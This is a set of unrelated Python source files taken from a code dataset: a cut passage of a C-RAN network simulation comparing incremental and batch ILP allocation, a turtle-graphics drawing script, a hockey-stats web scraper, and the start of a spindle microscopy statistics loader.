activated_switchs\n\t\t\tglobal b_activated_nodes\n\t\t\tglobal b_activated_dus\n\t\t\tglobal b_activated_lambdas\n\t\t\tglobal b_activated_switchs\n\t\t\tglobal redirected_rrhs\n\t\t\tglobal b_redirected_rrhs\n\t\t\tglobal time_inc\n\t\t\tglobal time_b\n\t\t\tglobal count_cloud\n\t\t\tglobal count_fog\n\t\t\tglobal b_count_cloud\n\t\t\tglobal b_count_fog\n\t\t\t#self.action = self.action = self.env.process(self.run())\n\t\t\tyield self.env.timeout(change_time)\n\t\t\tactual_stamp = self.env.now\n\t\t\t#print(\"next time {}\".format(next_time))\n\t\t\tnext_time = actual_stamp + change_time\n\t\t\ttraffics.append(total_period_requests)\n\t\t\tarrival_rate = loads.pop()/change_time\n\t\t\t#print(\"RRHS on {}\".format(len(actives)))\n\t\t\t#print(\"RRHs off {}\".format(len(rrhs)))\n\t\t\ttotal_inc_blocking.append(incremental_blocking)\n\t\t\ttotal_batch_blocking.append(batch_blocking)\n\t\t\tincremental_blocking = 0\n\t\t\tbatch_blocking = 0\n\t\t\t#calculates the average of activation of both cloud and fog nodes\n\t\t\t#activation of cloud nodes\n\t\t\tif count_cloud:\n\t\t\t\tmax_count_cloud.append(sum((count_cloud)))\n\t\t\t\tcount_cloud = []\n\t\t\telse:\n\t\t\t\tmax_count_cloud.append(0.0)\n\t\t\tif b_count_cloud:\n\t\t\t\tb_max_count_cloud.append(sum((b_count_cloud)))\n\t\t\t\tb_count_cloud = []\n\t\t\telse:\n\t\t\t\tb_max_count_cloud.append(0.0)\n\t\t\t#activation of fog nodes\n\t\t\tif count_fog:\n\t\t\t\taverage_count_fog.append(sum((count_fog)))\n\t\t\t\tcount_fog = []\n\t\t\telse:\n\t\t\t\taverage_count_fog.append(0.0)\n\t\t\tif b_count_fog:\n\t\t\t\tb_average_count_fog.append(sum((b_count_fog)))\n\t\t\t\tb_count_fog = []\n\t\t\telse:\n\t\t\t\tb_average_count_fog.append(0.0)\n\t\t\t#calculates the average time spent for the solution on this hour\n\t\t\tif time_inc:\n\t\t\t\tavg_time_inc.append((numpy.mean(time_inc)))\n\t\t\t\ttime_inc = []\n\t\t\telse:\n\t\t\t\tavg_time_inc.append(0.0)\n\t\t\tif time_b:\n\t\t\t\tavg_time_b.append((numpy.mean(time_b)))\n\t\t\t\ttime_b = []\n\t\t\telse:\n\t\t\t\tavg_time_b.append(0.0)\n\t\t\t#calculates the averages of power consumption and active resources\n\t\t\t#calculates the number of redirected RRHs\n\t\t\tif redirected_rrhs:\n\t\t\t\taverage_redir_rrhs.append(sum((redirected_rrhs)))\n\t\t\t\tredirected_rrhs = []\n\t\t\telse:\n\t\t\t\taverage_redir_rrhs.append(0)\n\t\t\tif b_redirected_rrhs:\n\t\t\t\tb_average_redir_rrhs.append(sum((b_redirected_rrhs)))\n\t\t\t\tb_redirected_rrhs = []\n\t\t\telse:\n\t\t\t\tb_average_redir_rrhs.append(0)\n\t\t\t#power consumption for the incremental case\n\t\t\tif power_consumption:\n\t\t\t\taverage_power_consumption.append(round(numpy.mean(power_consumption),4))\n\t\t\t\tpower_consumption = []\n\t\t\telse:\n\t\t\t\taverage_power_consumption.append(0.0)\n\t\t\t#power consumption for the batch case\n\t\t\tif batch_power_consumption:\n\t\t\t\tbatch_average_consumption.append(round(numpy.mean(batch_power_consumption), 4))\n\t\t\t\tbatch_power_consumption = []\n\t\t\telse:\n\t\t\t\tbatch_average_consumption.append(0.0)\n\t\t\t#activated nodes for the incremental case\n\t\t\tif activated_nodes:\n\t\t\t\taverage_act_nodes.append(max(activated_nodes))\n\t\t\t\tactivated_nodes = []\n\t\t\telse:\n\t\t\t\taverage_act_nodes.append(0)\n\t\t\t#activated lambdas for the incremental case\n\t\t\tif activated_lambdas:\n\t\t\t\taverage_act_lambdas.append(numpy.mean(activated_lambdas))\n\t\t\t\tactivated_lambdas = []\n\t\t\telse:\n\t\t\t\taverage_act_lambdas.append(0)\n\t\t\t#activated DUs for the incremental case\n\t\t\tif 
activated_dus:\n\t\t\t\taverage_act_dus.append(numpy.mean(activated_dus))\n\t\t\t\tactivated_dus = []\n\t\t\telse:\n\t\t\t\taverage_act_dus.append(0)\n\t\t\t#activated switches for the incremental case\n\t\t\tif activated_switchs:\n\t\t\t\taverage_act_switch.append(numpy.mean(activated_switchs))\n\t\t\t\tactivated_switchs = []\n\t\t\telse:\n\t\t\t\taverage_act_switch.append(0)\n\t\t\t#count the resources for the batch case\n\t\t\t#activated nodes for the batch case\n\t\t\tif b_activated_nodes:\n\t\t\t\tb_average_act_nodes.append(max(b_activated_nodes))\n\t\t\t\tb_activated_nodes = []\n\t\t\telse:\n\t\t\t\tb_average_act_nodes.append(0)\n\t\t\t#activated lambdas for the batch case\n\t\t\tif b_activated_lambdas:\n\t\t\t\tb_average_act_lambdas.append(numpy.mean(b_activated_lambdas))\n\t\t\t\tb_activated_lambdas = []\n\t\t\telse:\n\t\t\t\tb_average_act_lambdas.append(0)\n\t\t\t#activated DUs for the batch case\n\t\t\tif b_activated_dus:\n\t\t\t\tb_average_act_dus.append(numpy.mean(b_activated_dus))\n\t\t\t\tb_activated_dus = []\n\t\t\telse:\n\t\t\t\tb_average_act_dus.append(0)\n\t\t\t#activated switches for the batch case\n\t\t\tif b_activated_switchs:\n\t\t\t\tb_average_act_switch.append(numpy.mean(b_activated_switchs))\n\t\t\t\tb_activated_switchs = []\n\t\t\telse:\n\t\t\t\tb_average_act_switch.append(0)\n\t\t\tself.action = self.env.process(self.run())\n\t\t\tprint(\"Arrival rate is now {} at {} and {} requests were generated\".format(arrival_rate, self.env.now/3600, total_period_requests))\n\t\t\ttotal_period_requests = 0\n\n#control plane that controls the allocations and deallocations\nclass Control_Plane(object):\n\tdef __init__(self, env, util):\n\t\tself.env = env\n\t\tself.requests = simpy.Store(self.env)\n\t\tself.departs = simpy.Store(self.env)\n\t\tself.action = self.env.process(self.run())\n\t\tself.deallocation = self.env.process(self.depart_request())\n\t\t#self.audit = self.env.process(self.checkNetwork())\n\t\tself.ilp = None\n\t\tself.util = util\n\t\tself.ilpBatch = None\n\n\t#takes requests and tries to allocate each one on an RRH\n\tdef run(self):\n\t\tglobal total_aloc\n\t\tglobal total_nonaloc\n\t\tglobal no_allocated\n\t\tglobal count\n\t\tglobal actives\n\t\tglobal incremental_blocking\n\t\tglobal batch_blocking\n\t\twhile True:\n\t\t\tcount_nodes = 0\n\t\t\tcount_lambdas = 0\n\t\t\tcount_dus = 0\n\t\t\tcount_switches = 0\n\t\t\t#to count the activated fog nodes on the solution\n\t\t\tfog = 0\n\t\t\tb_fog = 0\n\t\t\t#create a list for the batch solution\n\t\t\tbatch_list = []\n\t\t\tr = yield self.requests.get()\n\t\t\t#create a list containing the rrhs\n\t\t\tantenas = []\n\t\t\tantenas.append(r)\n\t\t\t#put the rrh on the batch list for the batch scheduling\n\t\t\t#batch_list.append(r)\n\t\t\t#print(\"Allocating request {}\".format(r.id))\n\t\t\t#as soon as it gets the request, allocate it into an RRH\n\t\t\t#----------------------CALLS THE ILP-------------------------\n\t\t\tself.ilp = lp.ILP(antenas, range(len(antenas)), lp.nodes, lp.lambdas)\n\t\t\t#print(\"Calling ILP\")\n\t\t\t#calling the incremental ILP\n\t\t\ts = self.ilp.run()\n\t\t\tif s != None:\n\t\t\t\t#print(\"Optimal solution is: {}\".format(s.objective_value))\n\t\t\t\tsol = self.ilp.return_solution_values()\n\t\t\t\tself.ilp.updateValues(sol)\n\t\t\t\t#take the time spent on the solution\n\t\t\t\ttime_inc.append(s.solve_details.time)\n\t\t\t\t#count the type of activated nodes\n\t\t\t\tfor i in range(len(lp.nodeState)):\n\t\t\t\t\tif lp.nodeState[i] == 1:\n\t\t\t\t\t\tif i == 
0:\n\t\t\t\t\t\t\tcount_cloud.append(1)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tfog += 1\n\t\t\t\t\tcount_fog.append(fog)\n\t\t\t\tfor i in antenas:\n\t\t\t\t\tself.env.process(i.run())\n\t\t\t\t\tactives.append(i)\n\t\t\t\t\t#print(\"ACTIVE IS {}\".format(len(actives)))\n\t\t\t\t\tantenas.pop()\n\t\t\t\t\tcount += 1\n\t\t\t\t\tpower_consumption.append(self.util.getPowerConsumption(lp))\n\t\t\t\tif redirected_rrhs:\n\t\t\t\t\tredirected_rrhs.append(sum((redirected_rrhs[-1], len(sol.var_k))))\n\t\t\t\telse:\n\t\t\t\t\tredirected_rrhs.append(len(sol.var_k))\n\t\t\t\t#counts the current activated nodes, lambdas, DUs and switches\n\t\t\t\tfor i in lp.nodeState:\n\t\t\t\t\tif i == 1:\n\t\t\t\t\t\tcount_nodes += 1\n\t\t\t\tactivated_nodes.append(count_nodes)\n\t\t\t\tfor i in lp.lambda_state:\n\t\t\t\t\tif i == 1:\n\t\t\t\t\t\tcount_lambdas += 1\n\t\t\t\tactivated_lambdas.append(count_lambdas)\n\t\t\t\tfor i in lp.du_state:\n\t\t\t\t\tfor j in i:\n\t\t\t\t\t\tif j == 1:\n\t\t\t\t\t\t\tcount_dus += 1\n\t\t\t\tactivated_dus.append(count_dus)\n\t\t\t\tfor i in lp.switch_state:\n\t\t\t\t\tif i == 1:\n\t\t\t\t\t\tcount_switches += 1\n\t\t\t\tactivated_switchs.append(count_switches)\n\t\t\telse:\n\t\t\t\t#print(\"Can't find a solution!! {}\".format(len(rrhs)))\n\t\t\t\trrhs.append(r)\n\t\t\t\tnp.shuffle(rrhs)\n\t\t\t\tantenas.pop()\n\t\t\t\tincremental_blocking +=1\n\t\t\t\t#print(\"Inc blocking\")\n\t\t\t#print(lp.du_processing)\n\t\t\t#calls the batch ilp\n\t\t\tcount_nodes = 0\n\t\t\tcount_lambdas = 0\n\t\t\tcount_dus = 0\n\t\t\tcount_switches = 0\n\t\t\t#creates the input rrhs taking all that are active\n\t\t\tfor i in actives:\n\t\t\t\tcopy_of_rrh = copy.copy(i)\n\t\t\t\tbatch_list.append(copy_of_rrh)\n\t\t\tif s == None:\n\t\t\t\tcopy_of_r = copy.copy(r)\n\t\t\t\tbatch_list.append(copy_of_r)\n\t\t\tself.ilpBatch = plp.ILP(batch_list, range(len(batch_list)), plp.nodes, plp.lambdas)\n\t\t\tb_s = self.ilpBatch.run()\n\t\t\tif b_s != None:\n\t\t\t\t#take the time spent on the solution\n\t\t\t\ttime_b.append(b_s.solve_details.time)\n\t\t\t\tb_sol = self.ilpBatch.return_solution_values()\n\t\t\t\tself.ilpBatch.updateValues(b_sol)\n\t\t\t\tbatch_power_consumption.append(self.util.getPowerConsumption(plp))\n\t\t\t\t#count the occurrence of cloud and fog nodes activated\n\t\t\t\tfor i in range(len(plp.nodeState)):\n\t\t\t\t\tif plp.nodeState[i] == 1:\n\t\t\t\t\t\tif i == 0:\n\t\t\t\t\t\t\tb_count_cloud.append(1)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tb_fog += 1\n\t\t\t\t\tb_count_fog.append(b_fog)\n\t\t\t\t#counts the current activated nodes, lambdas, DUs and switches\n\t\t\t\tif b_redirected_rrhs:\n\t\t\t\t\tb_redirected_rrhs.append(sum((b_redirected_rrhs[-1], len(b_sol.var_k))))\n\t\t\t\telse:\n\t\t\t\t\tb_redirected_rrhs.append(len(b_sol.var_k))\n\t\t\t\tfor i in plp.nodeState:\n\t\t\t\t\tif i == 1:\n\t\t\t\t\t\tcount_nodes += 1\n\t\t\t\tb_activated_nodes.append(count_nodes)\n\t\t\t\tfor i in plp.lambda_state:\n\t\t\t\t\tif i == 1:\n\t\t\t\t\t\tcount_lambdas += 1\n\t\t\t\tb_activated_lambdas.append(count_lambdas)\n\t\t\t\tfor i in plp.du_state:\n\t\t\t\t\tfor j in i:\n\t\t\t\t\t\tif j == 1:\n\t\t\t\t\t\t\tcount_dus += 1\n\t\t\t\tb_activated_dus.append(count_dus)\n\t\t\t\tfor i in plp.switch_state:\n\t\t\t\t\tif i == 1:\n\t\t\t\t\t\tcount_switches += 1\n\t\t\t\tb_activated_switchs.append(count_switches)\n\t\t\t\t#print(len(actives))\n\t\t\t\t#print(plp.du_processing)\n\t\t\t\t#print(plp.lambda_node)\n\t\t\t\tself.ilpBatch.resetValues()\n\t\t\t\t#print(\"batch 
{}\".format(lp.du_processing))\n\n\t\t\telse:\n\t\t\t\t#print(\"Cant Batch allocate\")\n\t\t\t\t#print(plp.lambda_node)\n\t\t\t\tbatch_blocking += 1\n\t\t\t\t#print(\"Batch blocking\")\n\t\t\t\n\n\n\n\t#starts the deallocation of a request\n\tdef depart_request(self):\n\t\tglobal rrhs\n\t\t#global actives\n\t\twhile True:\n\t\t\tr = yield self.departs.get()\n\t\t\tself.ilp.deallocateRRH(r)\n\t\t\tr.var_x = None\n\t\t\tr.var_u = None\n\t\t\tr.enabled = True\n\t\t\trrhs.append(r)\n\t\t\tnp.shuffle(rrhs)\n\t\t\tactives.pop()\n\t\t\t#print(\"Deallocating RRH {}\".format(r.id))\n\n\t#allocates the RRHs/ONU turned on into a VPON in a processing node\n\tdef allocateRRH(self, rrh):\n\t\tilp = lp.ILP(range(0,1), range(0,2), range(0,10),switchBandwidth, 614.4, wavelength_capacity, lc_cost, B,\n\t\t r.createDUCapacitiesMatrix(), r.createNodeCostsMatrix(), r.createDUCostsMatrix())\n\t\ts = ilp.run()\n\t\t#print(\"Optimal allocation is {}\".format(s.objective_value))\n\n\t#to capture the state of the network at a given rate - will be used to take the metrics at a given (constant) moment\n\tdef checkNetwork(self):\n\t\twhile True:\n\t\t\tyield self.env.timeout(1800)\n\t\t\tprint(\"Taking network status at {}\".format(self.env.now))\n\t\t\tprint(\"Total generated requests is {}\".format(total_period_requests))\n\"\"\"\n#RRH that allocates the user requests according to its availability\n#each rrh is connected to both a cloud node and a fog node\n#each rrh can connect to a single fog node - a fog node can be connected to multiple rrhs\nclass RRH(object):\n\tdef __init__(self, env, aId, capacity, control_plane,cloud, fog):\n\t\tself.env = env\n\t\tself.id = aId\n\t\tself.allocated = False\n\t\tself.enabled = False\n\t\t#processing nodes connected to this rrh\n\t\tself.pns = []\n\t\tself.cp = cp\n\t\tself.action = None\n\n\t\t#executes this request and send it to deallocation after its service time\n\tdef run(self):\n\t\tyield self.env.timeout(self.service_time(self))\n\t\t#print(\"Request {} departing\".format(self.id))\n\t\tself.cp.departs.put(self)\n\"\"\"\n\n#this class represents a RRH containing its possible processing nodes\nclass RRH(object):\n\tdef __init__(self, aId, rrhs_matrix, env, service_time, cp):\n\t\tself.id = aId\n\t\tself.rrhs_matrix = rrhs_matrix\n\t\tself.var_x = None\n\t\tself.var_u = None\n\t\tself.env = env\n\t\tself.service_time = service_time\n\t\tself.cp = cp\n\t\tself.generationTime = 0.0\n\t\tself.waitingTime = 0.0\n\n\tdef run(self):\n\t\tyield self.env.timeout(np.uniform(0, next_time -self.env.now))\n\t\t#yield self.env.timeout(next_time - self.env.now)\n\t\tself.cp.departs.put(self)\n\n#Utility class\nclass Util(object):\n\t#print all active nodes\n\tdef printActiveNodes(self):\n\t\tfor i in pns:\n\t\t\tif i.state == 1:\n\t\t\t\ti.printNode()\n\n\t#create a list of RRHs with its own connected processing nodes\n\tdef createRRHs(self, amount,env, service_time, cp):\n\t\trrhs = []\n\t\tfor i in range(amount):\n\t\t\tr = RRH(i, [1,0,0], env, service_time, cp)\n\t\t\trrhs.append(r)\n\t\tself.setMatrix(rrhs)\n\t\treturn rrhs\n\n\t#set the rrhs_matrix for each rrh created\n\tdef setMatrix(self, rrhs):\n\t\tcount = 1\n\t\tfor r in rrhs:\n\t\t\tif count <= len(r.rrhs_matrix)-1:\n\t\t\t\tr.rrhs_matrix[count] = 1\n\t\t\t\tcount += 1\n\t\t\telse:\n\t\t\t\tcount = 1\n\t\t\t\tr.rrhs_matrix[count] = 1\n\t\t\t\tcount += 1\n\n\t\n\n\t#compute the power consumption at the moment\n\tdef getPowerConsumption(self, ilp):\n\t\tnetCost = 0.0\n\t\t#compute all activated nodes\n\t\tfor i in 
range(len(ilp.nodeState)):\n\t\t\tif ilp.nodeState[i] == 1:\n\t\t\t\tif i == 0:\n\t\t\t\t\tnetCost += 600.0\n\t\t\t\telse:\n\t\t\t\t\tnetCost += 500.0\n\t\t\t#compute activated DUs\n\t\t\tfor j in range(len(ilp.du_state[i])):\n\t\t\t\tif ilp.du_state[i][j] == 1:\n\t\t\t\t\tif i == 0:\n\t\t\t\t\t\tnetCost += 100.0\n\t\t\t\t\telse:\n\t\t\t\t\t\tnetCost += 50.0\n\t\t#compute lambda and switch costs\n\t\tfor w in ilp.lambda_state:\n\t\t\tif w == 1:\n\t\t\t\tnetCost += 20.0\n\t\tfor s in ilp.switch_state:\n\t\t\tif s == 1:\n\t\t\t\tnetCost += 15.0\n\t\treturn netCost\n\n\t#compute which nodes are active (cloud or fog, and how many of them are active)\n\tdef countNodes(self, ilp):\n\t\tcount_cloud = 0\n\t\tcount_fog = 0\n\t\tfor i in range(len(ilp.nodeState)):\n\t\t\tif ilp.nodeState[i] == 1:\n\t\t\t\tif i == 0:\n\t\t\t\t\tcount_cloud += 1\n\t\t\t\telse:\n\t\t\t\t\tcount_fog += 1\n\n\n\n\nutil = Util()\nenv = simpy.Environment()\ncp = Control_Plane(env, util)\nrrhs = util.createRRHs(45, env, service_time, cp)\n#for i in rrhs:\n#\tprint(i.rrhs_matrix)\nnp.shuffle(rrhs)\nt = Traffic_Generator(env, distribution, service_time, cp)\nprint(\"Begin at \"+str(env.now))\nenv.run(until = 86401)\n#print(\"Total generated requests {}\".format(t.req_count))\n#print(\"Allocated {}\".format(total_aloc))\n#print(\"Optimal solution got: {}\".format(op))\n#print(\"Non allocated {}\".format(total_nonaloc))\n#print(\"Size of Nonallocated {}\".format(len(no_allocated)))\nprint(\"End at \"+str(env.now))\n#print(len(actives))\n#print(lp.du_processing)\n#print(lp.wavelength_capacity)\n#print(lp.rrhs_on_nodes)\n#print(\"Daily power consumption (Incremental) were: {}\".format(average_power_consumption))\n#print(\"Daily power consumption (Batch) were: {}\".format(batch_average_consumption))\n#print(\"Inc redirection {}\".format(average_redir_rrhs))\n#print(\"Batch redirection {}\".format(b_average_redir_rrhs))\n\nmin_power = min(min(average_power_consumption), min(batch_average_consumption))\nmax_power = max(max(average_power_consumption), max(batch_average_consumption))\nmin_dus = min(min(average_act_dus), min(b_average_act_dus))\nmax_dus = max(max(average_act_dus), max(b_average_act_dus))\nmin_switch = min(min(average_act_switch), min(b_average_act_switch))\nmax_switch = max(max(average_act_switch), max(b_average_act_switch))\nmin_redirected = min(min(average_redir_rrhs), min(b_average_redir_rrhs))\nmax_redirected = max(max(average_redir_rrhs), max(b_average_redir_rrhs))\nmin_time = min(min(avg_time_inc), min(avg_time_b))\nmax_time = max(max(avg_time_inc), max(avg_time_b))\n\n#print(max_count_cloud)\n#print(average_count_fog)\n#print(b_max_count_cloud)\n#print(b_average_count_fog)\n\n#print(avg_time_inc)\nprint(average_act_nodes)\nprint(\"--------\")\nprint(b_average_act_nodes)\n#print(avg_time_b)\n\n#generate the plots for power consumption\nplt.plot(average_power_consumption, label = \"Inc ILP\")\nplt.plot(batch_average_consumption, label = \"Batch ILP\")\nplt.xticks(numpy.arange(min(hours_range), max(hours_range), 5))\nplt.yticks(numpy.arange(min_power, max_power, 500))\nplt.ylabel('Power Consumption')\nplt.xlabel(\"Time of the day\")\nplt.legend()\nplt.grid()\nplt.savefig('/home/tinini/Área de Trabalho/simQuaseFinal/CFRAN-Simulator/experiments/power_consumption.png', bbox_inches='tight')\n#plt.show()\nplt.clf()\n\n#generate the plots for activated lambdas\nplt.plot(average_act_lambdas, label = \"Inc ILP\")\nplt.plot(b_average_act_lambdas, label = \"Batch ILP\")\nplt.xticks(numpy.arange(min(hours_range), 
max(hours_range), 5))\nplt.yticks(numpy.arange(0, 10, 1))\nplt.ylabel('Activated Lambdas')\nplt.xlabel(\"Time of the day\")\nplt.legend()\nplt.grid()\nplt.savefig('/home/tinini/Área de Trabalho/simQuaseFinal/CFRAN-Simulator/experiments/activated_lambdas.png', bbox_inches='tight')\nplt.clf()\n\n#generate the plots for activated nodes\nplt.plot(average_act_nodes, label = \"Inc ILP\")\nplt.plot(b_average_act_nodes, label = \"Batch ILP\")\nplt.xticks(numpy.arange(min(hours_range), max(hours_range), 5))\nplt.yticks(numpy.arange(0, 10, 1))\nplt.ylabel('Activated Nodes')\nplt.xlabel(\"Time of the day\")\nplt.legend()\nplt.grid()\nplt.savefig('/home/tinini/Área de Trabalho/simQuaseFinal/CFRAN-Simulator/experiments/activated_nodes.png', bbox_inches='tight')\nplt.clf()\n\n#generate the plots for activated DUs\nplt.plot(average_act_dus, label = \"Inc ILP\")\nplt.plot(b_average_act_dus, label = \"Batch ILP\")\nplt.xticks(numpy.arange(min(hours_range), max(hours_range), 5))\nplt.yticks(numpy.arange(min_dus, max_dus, 5))\nplt.ylabel('Activated DUs')\nplt.xlabel(\"Time of the day\")\nplt.legend()\nplt.grid()\nplt.savefig('/home/tinini/Área de Trabalho/simQuaseFinal/CFRAN-Simulator/experiments/activated_DUs.png', bbox_inches='tight')\nplt.clf()\n\n#generate the plots for activated Switches\nplt.plot(average_act_switch, label = \"Inc ILP\")\nplt.plot(b_average_act_switch, label = \"Batch ILP\")\nplt.xticks(numpy.arange(min(hours_range), max(hours_range), 5))\nplt.yticks(numpy.arange(min_switch, max_switch+1, 1))\nplt.ylabel('Activated Switches')\nplt.xlabel(\"Time of the day\")\nplt.legend()\nplt.grid()\nplt.savefig('/home/tinini/Área de Trabalho/simQuaseFinal/CFRAN-Simulator/experiments/activated_switches.png', bbox_inches='tight')\nplt.clf()\n\n#generate the plots for redirected DUs\nplt.plot(average_redir_rrhs, label = \"Inc ILP\")\nplt.plot(b_average_redir_rrhs, label = \"Batch ILP\")\nplt.xticks(numpy.arange(min(hours_range), max(hours_range), 5))\nplt.yticks(numpy.arange(min_redirected, max_redirected, 10))\nplt.ylabel('Redirected RRHs')\nplt.xlabel(\"Time of the day\")\nplt.legend()\nplt.grid()\nplt.savefig('/home/tinini/Área de Trabalho/simQuaseFinal/CFRAN-Simulator/experiments/redirected_rrhs.png', bbox_inches='tight')\nplt.clf()\n\n#generate the plots for solution time\nplt.plot(avg_time_inc, label = \"Inc ILP\")\nplt.plot(avg_time_b, label = \"Batch ILP\")\nplt.xticks(numpy.arange(min(hours_range), max(hours_range), 5))\nplt.yticks(numpy.arange(min_time, max_time, 0.01))\nplt.ylabel('Solution Time (seconds)')\nplt.xlabel(\"Time of the day\")\nplt.legend()\nplt.grid()\nplt.savefig('/home/tinini/Área de Trabalho/simQuaseFinal/CFRAN-Simulator/experiments/solution_time.png', bbox_inches='tight')\nplt.clf()\n\n","sub_path":"simDynamicTemporalRRH.py","file_name":"simDynamicTemporalRRH.py","file_ext":"py","file_size_in_byte":23171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"632243877","text":"from turtle import *\nimport math\nglobal a\na = 10\ndef literka_T():\n fillcolor(\"darkgreen\")\n begin_fill()\n fd(a)\n lt(90)\n fd(a)\n rt(90)\n fd(a)\n lt(90)\n fd(a)\n lt(90)\n fd(3*a)\n lt(90)\n fd(a)\n lt(90)\n fd(a)\n rt(90)\n fd(a)\n end_fill()\n lt(90)\n\ndef tetki(ile):\n pass\n\ndef rządek(ile, poczatkowy_kąt):\n setheading(poczatkowy_kąt)\n for i in range((ile*2)-1):\n if i %2 == 1:\n setheading(90+poczatkowy_kąt)\n fd(2*a)\n setheading(0+poczatkowy_kąt)\n else:\n setheading(-90+poczatkowy_kąt)\n fd(2*a)\n setheading(0+poczatkowy_kąt)\n 
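# i%2 alternates between 0 and 1, so rt(180*(i%2)) flips the heading on every odd pass and the next letter is drawn upside down\n        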
rt(180*(i%2))\n literka_T()\n setheading(0+poczatkowy_kąt)\n if i %2 == 0:\n fd(4*a)\n else:\n fd(2*a)\n\n rt(180)\n fd(1*a)\n\ndef tetki_dla_jeden():\n for i in range(2):\n pd()\n literka_T()\n rt(90)\n fd(a)\n lt(90)\n fd(a)\n rt(180)\n for i in range(2):\n fd(a)\n rt(90)\n literka_T()\n fd(a)\n rt(90)\n lt(135)\n pu()\n fd(4*a*math.sqrt(2))\nspeed(0)\n\n\ndef ramka(ile):\n for i in range(4):\n rządek(ile, -90 * i)\n setheading(180)\n # fd(2*a)\n # rt(45)\n setheading(180)\n fd(2*a)\n rt(45)\n fd(1*a*math.sqrt(2))\n setheading(90)\n fd(2*a)\n\nramka(1)\n\nramka(2)\nramka(3)\n\n\ndone()","sub_path":"konkursy/14_2/teki.py","file_name":"teki.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"3775569","text":"from bs4 import BeautifulSoup as bs\nfrom selenium import webdriver\n\ndriver = webdriver.Chrome()\nsite = 'https://evolving-hockey.com/stats/team_standard/?_inputs_&std_tm_str=%225v5%22&std_tm_table=%22On-Ice%22&std_tm_team=%22All%22&std_tm_range=%22Seasons%22&std_tm_adj=%22Score%20%26%20Venue%22&std_tm_span=%22Regular%22&dir_ttbl=%22Stats%22&std_tm_type=%22Rates%22&std_tm_group=%22Season%22'\n\nr = driver.get(site)\nimport time\ntime.sleep(5)\nsoup = bs(driver.page_source, 'html.parser')\ndata = soup.find_all('tr')[1]\nfor d in data:\n print(d.get_text(strip=True), end=' ')\n\ndata2 = soup.find_all('tr')[1:33]\n\nfor x in data2:\n print(x.get_text(strip=True,separator=' '), end='\\n')\n\ndriver.quit()\n","sub_path":"scrapy_file/json_data_four.py","file_name":"json_data_four.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"439204625","text":"#!/usr/bin/env python3\n'''\nCreated on Mar 12, 2015\n\n@author: Tong LI\n'''\n\nfrom FileUtils import FileUtils\nimport os\nfrom SpindlesFileLoader import SpindlesFileLoader\nimport pandas as pd\nfrom numpy import mean, std\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom spindle_tracker.io.tifffile import TiffFile\nfrom matplotlib.pyplot import savefig\n\n\nclass SpbStatistics(object):\n '''\n This is a class to load spindle information (.csv)\n '''\n _tabData = pd.DataFrame()\n _path = ''\n _savePath = ''\n _rotatedData = pd.DataFrame(columns=['sp1x', 'sp1y', 'sp2x', 'sp2y',\n 'spCenterX', 'spCenterY',\n 'centerX', 'centerY', 'splength'],\n dtype=float)\n\n def __init__(self, savedir, pathToFilesDir=None, data=None):\n '''\n Constructor\n '''\n if pathToFilesDir:\n if FileUtils.is_ressource_exists(pathToFilesDir):\n self._path = pathToFilesDir\n if FileUtils.is_ressource_exists(savedir):\n self._savePath = savedir\n else:\n raise Exception(\"%s is not a directory !\\n\" % pathToFilesDir)\n acquisitions = os.listdir(pathToFilesDir)\n listFileNames = []\n for acquisition in acquisitions:\n if not acquisition.startswith(\".\"):\n listFileNames += \\\n FileUtils.getSpindleFilesInAnAcquisition(\n pathToFilesDir +\n acquisition)\n for f in listFileNames:\n if f.endswith(\"0_spindleAnalysis.csv\"):\n spdFileLoader = SpindlesFileLoader(f)\n df = spdFileLoader.getTabularData()\n df['AcquisitionCode'] =\\\n os.path.basename(os.path.dirname(os.path.dirname(f)))\n self._tabData =\\\n self._tabData.append(df,\n ignore_index=True)\n else:\n self._tabData = data\n if FileUtils.is_ressource_exists(savedir):\n self._savePath = savedir\n\n def printStatOf(self, attribut):\n print(\"Max:\\t\"+str(max(attribut)))\n print(\"Min:\\t\"+str(min(attribut)))\n 
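# mean and std here come from numpy (imported above); numpy's std defaults to the population standard deviation (ddof=0)\n        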
print(\"Mean:\\t\"+str(mean(attribut)))\n print(\"Standard deviation:\\t\"+str(std(attribut)))\n\n def getTabData(self):\n return self._tabData\n\n def dataCleanUp(self):\n cleanTabData = self._tabData\n cleanTabData =\\\n cleanTabData[cleanTabData['Feature'] != 'NO_SPOT']\n cleanTabData =\\\n cleanTabData[cleanTabData['NbOfSpotDetected'] <= 2]\n self._tabData = cleanTabData\n\n def setDataAsMitosisCells(self):\n self._tabData = self._tabData[self._tabData['Feature'] == 'SPINDLE']\n\n def mitosisPercent(self):\n dataFrame = self._tabData\n mitosis_cells = dataFrame[dataFrame['Feature'] == 'SPINDLE']\n return len(mitosis_cells)/len(dataFrame)\n\n def getAttributList(self):\n return self._tabData.columns\n\n def getAttribut(self, attributName):\n return self._tabData[attributName]\n\n def printAttributBasicStat(self, attributName):\n attribut = list(self._tabData[attributName])\n self.printStatOf(attribut)\n\n def plot2Attributs(self, axisXName, axisYName, xlim, ylim, save=False):\n axisX = self._tabData[axisXName]\n axisY = self._tabData[axisYName]\n fig, ax = plt.subplots(figsize=(15, 5))\n ax.scatter(axisX, axisY)\n plt.xlabel(axisXName)\n plt.ylabel(axisYName)\n plt.xlim(0, xlim)\n plt.ylim(0, ylim)\n if axisYName == \"CellCenterToSpCenterLen\":\n sd = np.std(axisY)\n m = np.mean(axisY)\n# threshold95 = m + 2*sd\n# permore95 = len(axisY[axisY>threshold95])/len(axisY)\n# ax.axhline(threshold95,color='red')\n ax.axhline(m, color='red')\n ax.text(30, 15, \"n=\"+str(len(axisX)),\n bbox={'alpha': 0.5, 'pad': 15}, fontsize=13)\n title = 'mean = %.4f\\nstd = %.4f' % (m, sd)\n# title = 'thresold that higher than 95%% = %.4f\\nstd = %.4f' % (m,sd)\n ax.text(20, 10, title,\n bbox={'facecolor': 'red', 'alpha': 0.5, 'pad': 15},\n fontsize=13)\n elif axisYName == \"SpAngToMaj\":\n ax.text(25, 80, \"n=\"+str(len(axisX)),\n bbox={'alpha': 0.5, 'pad': 15}, fontsize=13)\n 